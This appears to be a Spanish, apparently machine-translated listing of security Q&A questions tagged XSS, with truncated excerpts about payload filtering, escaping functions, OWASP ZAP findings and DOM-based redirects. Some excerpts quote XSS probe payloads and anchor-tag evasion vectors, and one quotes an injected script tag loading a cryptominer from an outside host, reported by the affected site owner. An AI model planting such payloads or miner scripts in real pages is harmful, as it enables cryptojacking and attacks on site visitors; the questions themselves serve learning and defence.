Preguntas con etiqueta 'xss'

preguntas con etiqueta
0
respuestas

XSS codifica / decodifica una interpretación de caracteres extraños

¿Puede alguien decirme por qué no puedo hacer que este XSS se refleje? ¿O por qué se filtra o no se procesa? La publicación enviada es: ... Content-Length: 91 add=1&reference=A</><img src=a onalert=alert(1)>EXPXSS&name=...
hecha 30.01.2015 - 13:06
0
respuestas

Vectores XSS para una nueva imagen ()

¿Cuáles son los posibles vectores XSS para este código JavaScript new Image().src = encodeURI('[user url here]'); Supongamos dos casos: [user url here] es una cadena proporcionada por el usuario (sin validación) [user url...
hecha 12.06.2014 - 21:58
0
respuestas

¿Qué tan segura es la función StringEscapeUtils.escapeXml de Apache para prevenir XSS?

Estoy usando escapeXML StringEscapeUtils.escapeXml para evitar XSS en mi aplicación Java. Pero me pregunto si se resuelve XSS al máximo. He intentado algunos vectores de ataque XSS, y escapeXml parece funcionar bien. Básicamente, la mayorí...
hecha 05.05.2014 - 09:21
4
respuestas

¿Cómo funciona XSS? [cerrado]

Tengo muy poca experiencia en desarrollo web, pero me interesa la seguridad. Sin embargo, no he entendido completamente cómo funciona XSS. ¿Se lo puedes explicar a med? El artículo de Wikipedia me da una buena idea, pero no creo que lo entienda...
hecha 28.12.2010 - 17:58
1
respuesta

¿Es posible obtener una fuente flash después de una redirección o un elemento dentro de una etiqueta de incrustación / objeto / iframe (dominio cruzado)?

La URL example.com/auth redirigirá automáticamente al usuario (HTTP 302) a example.com/signed_in.SWF ? token = SENSITIVE. ¿Es posible que un atacante robe el token, usando javascript o flash, en el siguiente ejemplo? ¿Cómo? <!DOCTYPE htm...
hecha 28.08.2015 - 22:57
1
respuesta

Javascript inyectado en mi documento HTML

Recientemente me di cuenta de que seguí JavaScript en varias de mis páginas (generalmente antes de cerrar la etiqueta del cuerpo): <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cr...
hecha 08.06.2018 - 12:13
3
respuestas

¿Cómo la etiqueta de ancla (a) le permite hacer un XSS reflejado?

Estaba revisando la OWASP XSS Filter Evasion Cheat Sheet y y encontré esta sección donde hay una etiqueta de anclaje utilizada para hacer un XSS en las siguientes formas: <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.o...
hecha 05.05.2014 - 05:49
1
respuesta

¿Cómo OWASP ZAP encuentra Reflected XSS?

Lo que estoy haciendo: Estoy usando OWASP Zap para encontrar vulnerabilidades en un sitio (tengo el consentimiento del propietario) y Zap ideó una vulnerabilidad de XSS reflejada después de realizar una exploración activa en una solicitud P...
hecha 09.11.2018 - 02:08
4
respuestas

Carga útil XSS menor de 20 caracteres

Para un proyecto universitario, debo realizar un análisis en una aplicación web para descubrir las vulnerabilidades de XSS. Después de esto, tengo que informar y crear una prueba automática para probar las vulnerabilidades que he descubierto....
hecha 09.12.2018 - 19:04
4
respuestas

¿Usar XSS basado en DOM para redirigir a un dominio diferente o ejecutar un script?

Estaba probando mis manos en XSS basado en DOM. Me encontré con un escenario donde una cadena controlada por el usuario de la URL se incluye en JavaScript como se muestra a continuación. var userControlled=substring of URL; window.location="/a...
hecha 21.11.2011 - 11:45